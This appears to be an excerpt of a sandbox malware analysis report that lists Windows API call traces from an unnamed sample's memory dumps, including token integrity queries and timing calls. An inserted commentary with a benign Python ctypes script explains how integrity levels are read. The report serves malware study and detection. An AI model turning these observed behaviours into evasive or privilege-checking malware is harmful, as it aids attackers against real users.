                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?), ref: 00130054
                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?), ref: 00130064
                                                                                                                                                                                                                                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?), ref: 00130070
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3897988419-0
                                                                                                                                                                                                                                          • Opcode ID: f8d3006641bad8e14063712f48c8005e2fdf0cad72d1ad8be8881a8a6c4d78a3
                                                                                                                                                                                                                                          • Instruction ID: cd1f8a3c55ea300e85187eed8c7a73114fdf4c42109591d3558b89f7e2dbb49d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8d3006641bad8e14063712f48c8005e2fdf0cad72d1ad8be8881a8a6c4d78a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F01A272600214BFDB265F68DC44BBA7AEDEF48791F148128F945D3210D7B5DD808BA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0013E997
                                                                                                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 0013E9A5
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0013E9AD
                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0013E9B7
                                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 0013E9F3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2833360925-0
                                                                                                                                                                                                                                          • Opcode ID: b02ecfb72faa6d5236a6ab9fcd57f9a9639952278bb6a6f71cc22ea87018c7e4
                                                                                                                                                                                                                                          • Instruction ID: dbf37614aa4d9b2885232d5022e519821ce96cbca7cc41efc03a6df9527eb68d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b02ecfb72faa6d5236a6ab9fcd57f9a9639952278bb6a6f71cc22ea87018c7e4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7012931C01629DBCF04AFE5DC59AEDBBB8FF09705F010556E942B2281CB709695CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00131114
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 00131120
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 0013112F
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 00131136
                                                                                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0013114D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 842720411-0
                                                                                                                                                                                                                                          • Opcode ID: 6eb05cc54c88c05b7419e7e960d963c43854d087abf4862ff08467dc9329dbe7
                                                                                                                                                                                                                                          • Instruction ID: b15b1154daa9f0353246bd953d2cd857e9fda146294efac8235b19f7ff6d9db3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eb05cc54c88c05b7419e7e960d963c43854d087abf4862ff08467dc9329dbe7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA011979200205FFDB114FA5DC49ABA3B6EEF8A3A0B244419FA85D7360DB71DC40DAA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00130FCA
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00130FD6
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00130FE5
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00130FEC
                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00131002
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: e696da05b32ea2f38639f9c8cf6deac3acef7b8877cabfdd33d8bec3a7596cf1
• Instruction ID: aa964a71ffe3648b67775901dd6125c06b655331af0fe426c5ac6c4d3b4cf396
• Opcode Fuzzy Hash: e696da05b32ea2f38639f9c8cf6deac3acef7b8877cabfdd33d8bec3a7596cf1
• Instruction Fuzzy Hash: 8CF04939200311FBDB214FA59C49F663BADEF8A762F204414FA89D6251CAB1DC808AA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0013102A
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00131036
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00131045
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0013104C
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00131062
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: b94c941807baf2d95be559ed2481b8c18f1f27272a67de6246f8bf3056ecfbc2
• Instruction ID: 4f16d5138abbc9008c9cac8cd0ec3001a962f0016443f54a13e95c786926122a
• Opcode Fuzzy Hash: b94c941807baf2d95be559ed2481b8c18f1f27272a67de6246f8bf3056ecfbc2
• Instruction Fuzzy Hash: EAF06D39200311FBDB215FA5EC59F663BADFF8A761F200814FA85D7250CBB1D8808AA0
Uniqueness
Uniqueness Score: -1.00%
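The five-call sequence in the block above (GetTokenInformation with a NULL buffer and length 0, GetLastError, GetProcessHeap, HeapAlloc, GetTokenInformation again) is the standard way to read a variable-length token attribute: the first call fails with ERROR_INSUFFICIENT_BUFFER and reports the size required, the caller allocates that much from the process heap, and the second call fills the buffer. The Python below is an added example, not code from the analysed sample or from Joe Sandbox; it replays that pattern through ctypes on Windows and decodes the returned TOKEN_MANDATORY_LABEL into an integrity level, with an offline path that runs the same SID parser on a constructed label SID so it can be exercised anywhere. One caveat on the trace annotation: in TOKEN_INFORMATION_CLASS the value 3 is TokenPrivileges, while TokenIntegrityLevel is 25; the two-call shape is identical for both classes, and the example uses 25 so that the parser applies. All function and constant names are the example's own.

```python
"""Two-call GetTokenInformation pattern for TokenIntegrityLevel (added example)."""
import struct
import sys

# Documented Windows constants (winnt.h / winerror.h).
TOKEN_QUERY = 0x0008
TOKEN_INTEGRITY_LEVEL = 25              # TOKEN_INFORMATION_CLASS::TokenIntegrityLevel
ERROR_INSUFFICIENT_BUFFER = 122
SECURITY_MANDATORY_LABEL_AUTHORITY = 16  # mandatory-label SIDs are S-1-16-<rid>

# Mandatory-label RIDs, lowest to highest.
_LEVELS = [
    (0x0000, "Untrusted"),
    (0x1000, "Low"),
    (0x2000, "Medium"),
    (0x2100, "Medium Plus"),
    (0x3000, "High"),
    (0x4000, "System"),
    (0x5000, "Protected Process"),
]


def parse_sid(raw: bytes):
    """Decode a binary SID: revision, sub-authority count, 48-bit authority, sub-authorities."""
    if len(raw) < 8:
        raise ValueError("SID shorter than its fixed header")
    revision, count = raw[0], raw[1]
    if revision != 1 or len(raw) < 8 + 4 * count:
        raise ValueError("malformed SID")
    authority = int.from_bytes(raw[2:8], "big")              # IdentifierAuthority is big-endian
    subs = list(struct.unpack_from("<%dI" % count, raw, 8))  # sub-authorities are little-endian DWORDs
    return authority, subs


def sid_to_string(raw: bytes) -> str:
    authority, subs = parse_sid(raw)
    return "S-1-%d" % authority + "".join("-%d" % s for s in subs)


def integrity_rid_from_sid(raw: bytes) -> int:
    """Return the RID of a mandatory-label SID (the integrity level); reject any other SID."""
    authority, subs = parse_sid(raw)
    if authority != SECURITY_MANDATORY_LABEL_AUTHORITY or len(subs) != 1:
        raise ValueError("not a mandatory label SID: " + sid_to_string(raw))
    return subs[0]


def integrity_name(rid: int) -> str:
    """Map a RID to its level name; values between defined steps take the level below them."""
    name = "Untrusted"
    for floor, label in _LEVELS:
        if rid >= floor:
            name = label
    return name


def build_label_sid(rid: int) -> bytes:
    """Construct a binary S-1-16-<rid> SID (constructed sample data for offline use and tests)."""
    return bytes([1, 1]) + SECURITY_MANDATORY_LABEL_AUTHORITY.to_bytes(6, "big") + struct.pack("<I", rid)


def query_token_integrity_rid() -> int:
    """Windows only: the two-call GetTokenInformation sequence from the trace, via ctypes."""
    import ctypes
    from ctypes import wintypes

    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.GetCurrentProcess.restype = wintypes.HANDLE
    advapi32.OpenProcessToken.argtypes = [wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE)]
    advapi32.GetTokenInformation.argtypes = [wintypes.HANDLE, ctypes.c_int, ctypes.c_void_p,
                                             wintypes.DWORD, ctypes.POINTER(wintypes.DWORD)]
    advapi32.GetLengthSid.argtypes = [ctypes.c_void_p]
    advapi32.GetLengthSid.restype = wintypes.DWORD
    kernel32.CloseHandle.argtypes = [wintypes.HANDLE]

    token = wintypes.HANDLE()
    if not advapi32.OpenProcessToken(kernel32.GetCurrentProcess(), TOKEN_QUERY, ctypes.byref(token)):
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        needed = wintypes.DWORD(0)
        # Call 1: NULL buffer, length 0. Fails with ERROR_INSUFFICIENT_BUFFER and sets `needed`.
        advapi32.GetTokenInformation(token, TOKEN_INTEGRITY_LEVEL, None, 0, ctypes.byref(needed))
        err = ctypes.get_last_error()
        if err != ERROR_INSUFFICIENT_BUFFER:
            raise ctypes.WinError(err)
        buf = ctypes.create_string_buffer(needed.value)  # stands in for GetProcessHeap/HeapAlloc
        # Call 2: same query with the sized buffer; it now holds a TOKEN_MANDATORY_LABEL.
        if not advapi32.GetTokenInformation(token, TOKEN_INTEGRITY_LEVEL, buf, needed, ctypes.byref(needed)):
            raise ctypes.WinError(ctypes.get_last_error())
        # Label.Sid is the first field: a pointer to the SID, which the API placed inside buf.
        sid_ptr = ctypes.cast(buf, ctypes.POINTER(ctypes.c_void_p))[0]
        raw_sid = ctypes.string_at(sid_ptr, advapi32.GetLengthSid(sid_ptr))
        return integrity_rid_from_sid(raw_sid)
    finally:
        kernel32.CloseHandle(token)


if __name__ == "__main__":
    if sys.platform == "win32":
        rid = query_token_integrity_rid()
    else:
        rid = integrity_rid_from_sid(build_label_sid(0x3000))  # constructed sample: S-1-16-12288 (High)
    print("integrity level: %s (0x%04X)" % (integrity_name(rid), rid))
```

Run it on Windows from an elevated and a non-elevated shell to see the High/Medium split; on other platforms it decodes the constructed SID only. The parser rejects SIDs outside the S-1-16 authority rather than silently reading their last sub-authority, which is the check a caller wants before trusting the value for a privilege decision.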

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0014017D,?,001432FC,?,00000001,00112592,?), ref: 00140324
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0014017D,?,001432FC,?,00000001,00112592,?), ref: 00140331
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0014017D,?,001432FC,?,00000001,00112592,?), ref: 0014033E
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0014017D,?,001432FC,?,00000001,00112592,?), ref: 0014034B
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0014017D,?,001432FC,?,00000001,00112592,?), ref: 00140358
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0014017D,?,001432FC,?,00000001,00112592,?), ref: 00140365
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                          • Opcode ID: 39d85853d1bf059f56d6521d820b9ecfcffff2e05cef4b40f0ae3c4dddff71fd
                                                                                                                                                                                                                                          • Instruction ID: 2d8afc62d660eae949f8c28d2185c1781c7c9230de3852165f51a1908c6ed618
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39d85853d1bf059f56d6521d820b9ecfcffff2e05cef4b40f0ae3c4dddff71fd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB01AA72800B159FCB32AF66D890812FBF9BF643153158A3FD29652931C3B1A998CF80
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D752
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000), ref: 001029DE
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: GetLastError.KERNEL32(00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000,00000000), ref: 001029F0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D764
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D776
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D788
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D79A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                          • Opcode ID: 53e2be19b711a2e9bb53924a45cd891ecd6cc24b94c0923763d2d9a9a3c98df9
                                                                                                                                                                                                                                          • Instruction ID: e945bf947e9ac6f974543a65838be6768d1911f1a1c22efc9f099e013388d2e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53e2be19b711a2e9bb53924a45cd891ecd6cc24b94c0923763d2d9a9a3c98df9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F01232544219ABC621EBA8F9C6C1677DDBB547187A50806F1C8E7981C7B0FC8086B4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00135C58
                                                                                                                                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00135C6F
                                                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 00135C87
                                                                                                                                                                                                                                          • KillTimer.USER32(?,0000040A), ref: 00135CA3
                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00135CBD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: be8d59f1dabbf68a41650c0d8cd98f126e0d6d866e6a6b4d33f0b1ea339c55a8
• Instruction ID: ccdd157ae31d7df3703786007395b42292c656e4475a00d523bb33b6b5c9fad4
• Opcode Fuzzy Hash: be8d59f1dabbf68a41650c0d8cd98f126e0d6d866e6a6b4d33f0b1ea339c55a8
• Instruction Fuzzy Hash: F9018630500B04ABEB245B10DD4EFB67BBDBB00B06F04155AE583A19E1DBF4A9C4CA94
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 001022BE
  • Part of subcall function 001029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000), ref: 001029DE
  • Part of subcall function 001029C8: GetLastError.KERNEL32(00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000,00000000), ref: 001029F0
• _free.LIBCMT ref: 001022D0
• _free.LIBCMT ref: 001022E3
• _free.LIBCMT ref: 001022F4
• _free.LIBCMT ref: 00102305
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 867b86235ce539405372bc39ee02c569b0aa2eff67becc07ec0ee16f08508a90
• Instruction ID: 0d17ce3e66329b7682f497693e3d8d13d099497518f075853fae1fd72a01b4dd
• Opcode Fuzzy Hash: 867b86235ce539405372bc39ee02c569b0aa2eff67becc07ec0ee16f08508a90
• Instruction Fuzzy Hash: DAF03AB48101289FCA13BF94BC059483B64B72AB60B60050BF490E3AF1C7705891AFE4
Uniqueness

Uniqueness Score: -1.00%

APIs
• EndPath.GDI32(?), ref: 000E95D4
• StrokeAndFillPath.GDI32(?,?,001271F7,00000000,?,?,?), ref: 000E95F0
• SelectObject.GDI32(?,00000000), ref: 000E9603
• DeleteObject.GDI32 ref: 000E9616
• StrokePath.GDI32(?), ref: 000E9631
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: 84b303ed53dccb4428d9d5ea399644dcd29df3016f29db104a5fce2b9064bbc1
• Instruction ID: aef2f2bca5212ae1f46da0e061fd0a908a95c496d4b19e9242bb9d011145387f
• Opcode Fuzzy Hash: 84b303ed53dccb4428d9d5ea399644dcd29df3016f29db104a5fce2b9064bbc1
• Instruction Fuzzy Hash: 0CF03735006748FFDB225F6AED1CB7A3BA1AB0236AF048215F4A5658F0C77089D5DF60
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: __freea$_free
• String ID: a/p$am/pm
• API String ID: 3432400110-3206640213
• Opcode ID: b51feb5f31aca9e676ed05e4e8a779acdc75478354270fa4b6773430d298adde
• Instruction ID: 2be2015dfe370b6f8243a137c7cf3dbfb3ccc5b94e98e470a09c166e491edbd1
• Opcode Fuzzy Hash: b51feb5f31aca9e676ed05e4e8a779acdc75478354270fa4b6773430d298adde
• Instruction Fuzzy Hash: 49D1F131900206EADB289F68C885BFAB7B1FF05310F294159E9C19FAD1D3F99D80CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000F0242: EnterCriticalSection.KERNEL32(001A070C,001A1884,?,?,000E198B,001A2518,?,?,?,000D12F9,00000000), ref: 000F024D
  • Part of subcall function 000F0242: LeaveCriticalSection.KERNEL32(001A070C,?,000E198B,001A2518,?,?,?,000D12F9,00000000), ref: 000F028A
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
  • Part of subcall function 000F00A3: __onexit.LIBCMT ref: 000F00A9
• __Init_thread_footer.LIBCMT ref: 00157BFB
  • Part of subcall function 000F01F8: EnterCriticalSection.KERNEL32(001A070C,?,?,000E8747,001A2514), ref: 000F0202
